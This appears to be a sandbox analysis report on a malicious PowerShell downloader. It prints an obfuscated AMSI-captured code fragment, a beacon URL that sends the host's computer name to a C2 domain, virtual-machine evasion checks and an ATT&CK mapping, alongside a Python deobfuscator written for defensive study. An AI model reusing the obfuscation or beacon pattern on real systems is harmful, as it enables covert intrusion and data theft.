Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8632:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zuclxt1.twn.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $2hk5joxacz80mi3.(([char[]]@((-7788+7855),(2142-(1655265/(4201325/(11789485/2287)))),(5896-5784),(9748-(47855817/4971)),(6494-(4206+(-1188+3392))),(344988/(31608360/(10006+(387040/(2088+(9123-8851))))))) -join ''))( $s98nu1tql0hxpyj ) $2hk5joxacz80mi3.((-join (@((-8433+8500),(3813-(2078+(6773201/(8288-4125)))),(320346/2886),(988770/(9710-(338048/304))),(129381/(9729-(53847552/(40443030/(10220-(15341125/3959)))))))| ForEach-Object { [char]$_ })))()$hmjer3wv2f7ykpl.(([char[]]@((383374/5722),(6167-(-185+(5809+435))),(-7725+7836),(-11+126),(10126-10025)) -join ''))()[byte[]] $gcw81akx7l463u2 = $s98nu1tql0hxpyj.(([char[]]@((-5268+5352),(3362-3251),(-4718+4783),(308712/(3749-1041)),(869136/(4966+2658)),(518562/(40511988/7578)),(5654-5533)) -join ''))() $u16t4qil590pz7d=$gcw81akx7l463u2 return $u16t4qil590pz7d}[System.Text.Encoding]::ascii.((-join (@((613582/8642),(-1445+1546),(715604/6169),(1738-(-7707+(66329770/(23104185/(4452-(4870-(-2231+(2609+(633792/192))))))))),(868376/(-369+7855)),(603288/5292),(2806-2701),(485-375),(150380/(7289-(12057-6228))))| ForEach-Object { [char]$_ })))((fm3l96o5ykb4tr27s0nvzqhwaiu " [buffer truncated]
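The AMSI buffer above never names a .NET member in clear text: every method is built at call time from a list of integer expressions, either as `.(([char[]]@((-7788+7855),...) -join ''))` or as `.((-join (@(...)| ForEach-Object { [char]$_ })))`, which is the pattern behind the "Uses code obfuscation techniques" signature and the reason AMSI, not string search, is what exposed it. The deobfuscator below is an added example written for this page, not part of the Joe Sandbox report or of the sample: it evaluates each arithmetic list with Python's `ast` module (no `eval`) and rewrites the member accesses to their plain names. Run over the excerpt copied from the buffer above, it recovers CopyTo, Close, Close, ToArray and GetString, which reads as: copy a `CompressionMode]::Decompress` stream into a memory stream, return its bytes, ASCII-decode them. The base64 argument that follows the `fm3l96o5ykb4tr27s0nvzqhwaiu` call is not on the page, so a labelled placeholder stands in for it; the excerpt is otherwise verbatim.

```python
import ast
import operator
import re

# Excerpt of the AMSI buffer recorded in the report above, copied verbatim up
# to the GetString call. The base64 argument that follows is not on the page,
# so a labelled placeholder stands in for it. Constructed test input.
AMSI_EXCERPT = (
    "$2hk5joxacz80mi3.(([char[]]@((-7788+7855),(2142-(1655265/(4201325/(11789485/2287)))),"
    "(5896-5784),(9748-(47855817/4971)),(6494-(4206+(-1188+3392))),"
    "(344988/(31608360/(10006+(387040/(2088+(9123-8851))))))) -join ''))( $s98nu1tql0hxpyj ) "
    "$2hk5joxacz80mi3.((-join (@((-8433+8500),(3813-(2078+(6773201/(8288-4125)))),(320346/2886),"
    "(988770/(9710-(338048/304))),(129381/(9729-(53847552/(40443030/(10220-(15341125/3959)))))))"
    "| ForEach-Object { [char]$_ })))()"
    "$hmjer3wv2f7ykpl.(([char[]]@((383374/5722),(6167-(-185+(5809+435))),(-7725+7836),(-11+126),"
    "(10126-10025)) -join ''))()"
    "[byte[]] $gcw81akx7l463u2 = $s98nu1tql0hxpyj.(([char[]]@((-5268+5352),(3362-3251),(-4718+4783),"
    "(308712/(3749-1041)),(869136/(4966+2658)),(518562/(40511988/7578)),(5654-5533)) -join ''))() "
    "$u16t4qil590pz7d=$gcw81akx7l463u2 return $u16t4qil590pz7d}"
    "[System.Text.Encoding]::ascii.((-join (@((613582/8642),(-1445+1546),(715604/6169),"
    "(1738-(-7707+(66329770/(23104185/(4452-(4870-(-2231+(2609+(633792/192))))))))),"
    "(868376/(-369+7855)),(603288/5292),(2806-2701),(485-375),(150380/(7289-(12057-6228))))"
    "| ForEach-Object { [char]$_ })))"
    '((fm3l96o5ykb4tr27s0nvzqhwaiu "<base64 blob omitted>"))'
)

# The two wrappers this sample uses to build a member name at call time:
#   .(([char[]]@(expr, expr, ...) -join ''))
#   .((-join (@(expr, expr, ...)| ForEach-Object { [char]$_ })))
# Either way the name is the list of integer expressions that follows "@(".
_LIST_MARKERS = re.compile(r"\[char\[\]\]@\(|-join \(@\(")
_BINOPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}


def eval_int_expr(expr: str) -> int:
    """Evaluate integer arithmetic (+ - * / and parentheses) over the AST, never eval().
    Division must be exact; a remainder means the expression was copied wrongly."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) is int:
            return node.value
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, (ast.USub, ast.UAdd)):
            value = walk(node.operand)
            return -value if isinstance(node.op, ast.USub) else value
        if isinstance(node, ast.BinOp):
            left, right = walk(node.left), walk(node.right)
            if isinstance(node.op, ast.Div):
                if right == 0 or left % right:
                    raise ValueError(f"non-integer division in {expr!r}")
                return left // right
            if type(node.op) in _BINOPS:
                return _BINOPS[type(node.op)](left, right)
        raise ValueError(f"unsupported construct in {expr!r}")
    return walk(ast.parse(expr.strip(), mode="eval"))


def matching_paren(text: str, open_idx: int) -> int:
    """Index of the ')' that closes the '(' at open_idx."""
    depth = 0
    for i in range(open_idx, len(text)):
        if text[i] == "(":
            depth += 1
        elif text[i] == ")":
            depth -= 1
            if depth == 0:
                return i
    raise ValueError("unbalanced parentheses")


def split_top_level(body: str) -> list:
    """Split a comma-separated list on commas that are not inside parentheses."""
    parts, depth, current = [], 0, []
    for ch in body:
        depth += (ch == "(") - (ch == ")")
        if ch == "," and depth == 0:
            parts.append("".join(current))
            current = []
        else:
            current.append(ch)
    parts.append("".join(current))
    return [p for p in parts if p.strip()]


def recover_names(script: str) -> list:
    """Return every member name encoded by a char-array wrapper, in script order."""
    names = []
    for m in _LIST_MARKERS.finditer(script):
        open_idx = m.end() - 1                        # the '(' of '@('
        close_idx = matching_paren(script, open_idx)
        exprs = split_top_level(script[open_idx + 1:close_idx])
        names.append("".join(chr(eval_int_expr(e)) for e in exprs))
    return names


def deobfuscate(script: str) -> str:
    """Rewrite each `.((<wrapper>))` member access to its plain `.Name` form."""
    out = script
    while (m := _LIST_MARKERS.search(out)):
        dot = out.rfind(".(", 0, m.start())           # the member access wrapping this list
        if dot == -1:
            raise ValueError("wrapper is not used as a member name")
        end = matching_paren(out, dot + 1)
        name = recover_names(out[dot:end + 1])[0]
        out = out[:dot] + "." + name + out[end + 1:]
    return out
```

`recover_names(AMSI_EXCERPT)` yields `['CopyTo', 'Close', 'Close', 'ToArray', 'GetString']`, and `deobfuscate` turns the first call into `$2hk5joxacz80mi3.CopyTo( $s98nu1tql0hxpyj )`. The exact-division check matters in practice: the author chose operands so that every `/` lands on an integer, so a remainder is the quickest sign that a character was lost when the buffer was copied out of a report or a log.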
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: download.ps1Virustotal: Detection: 15%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.36318893418.00000257B4526000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.36318893418.00000257B4526000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb[B}X source: powershell.exe, 00000001.00000002.36324659770.00000257B48AE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000001.00000002.36325370755.00000257B4BF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.36325370755.00000257B4BCC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000001.00000002.36322503212.00000257B47BE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000001.00000002.36325370755.00000257B4BF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000001.00000002.36318893418.00000257B44D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.36322503212.00000257B4829000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb{ source: powershell.exe, 00000001.00000002.36322503212.00000257B4829000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb(h source: powershell.exe, 00000001.00000002.36325370755.00000257B4BCC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbS source: powershell.exe, 00000001.00000002.36326314777.00000257B4BFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdb source: powershell.exe, 00000001.00000002.36325370755.00000257B4BCC000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFE0B99D2A5 pushad ; iretd 1_2_00007FFE0B99D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFE0BAB1905 push eax; iretd 1_2_00007FFE0BAB1A19
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFE0BAB00BD pushad ; iretd 1_2_00007FFE0BAB00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFE0BAB508D push ebp; iretd 1_2_00007FFE0BAB50A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFE0BD0725D push edx; retf 1_2_00007FFE0BD0726B

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9900
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: powershell.exe, 00000001.00000002.36241645195.000002579CF8B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware(
Source: powershell.exe, 00000001.00000002.36324659770.00000257B48D6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000001.00000002.36241645195.000002579CF8B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachine(
Source: powershell.exe, 00000001.00000002.36325370755.00000257B4BCC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000001.00000002.36241645195.000002579CF8B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Tactics and techniques (a number in parentheses marks a technique matched in this analysis and gives its match count; unnumbered entries are the standard cells of the matrix):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Windows Management Instrumentation (2), PowerShell (1), At, Cron, Launchd, Scheduled Task
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Privilege Escalation: Process Injection (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (1), Process Injection (1), Obfuscated Files or Information (1), DLL Side-Loading (1), Software Packing, Steganography
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: Security Software Discovery (21), Virtualization/Sandbox Evasion (1), Process Discovery (1), Application Window Discovery (1), File and Directory Discovery (2), System Information Discovery (11)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Command and Control: Ingress Tool Transfer (1), Non-Application Layer Protocol (2), Application Layer Protocol (12), Protocol Impersonation, Fallback Channels, Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop
Source | Detection | Scanner
download.ps1 | 3% | ReversingLabs
download.ps1 | 15% | Virustotal
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://$9bsu5ro72hgpqxk/$x4dbnkmt7rp9vl2.php?id=$env:computername&key=$dekctvjq&s=527 | 0% | Avira URL Cloud | safe
http://kmaealcfcalhcac.top | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.pngh | 0% | Avira URL Cloud | safe
http://crl.microsoft. | 0% | Avira URL Cloud | safe
https://oneget.org | 0% | Avira URL Cloud | safe
http://crl.v | 0% | Avira URL Cloud | safe
https://apis.google.comXz | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
kmaealcfcalhcac.top | 45.61.136.138 | true | true | | unknown
www.google.com | 142.250.191.196 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://www.google.com/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.google.com/intl/en/about/products?tab=wh | powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://photos.google.com/?tab=wq&pageId=none | powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://csp.withgoogle.com/csp/gws/other-hp | powershell.exe, 00000001.00000002.36305951926.00000257AC5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC540000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D114000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000001.00000002.36305951926.00000257AC3D6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://news.google.com/?tab=wn | powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://docs.google.com/document/?usp=docs_alc | powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schema.org/WebPage | powershell.exe, 00000001.00000002.36241645195.000002579D711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D725000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC65F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D72E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D720000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D71B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 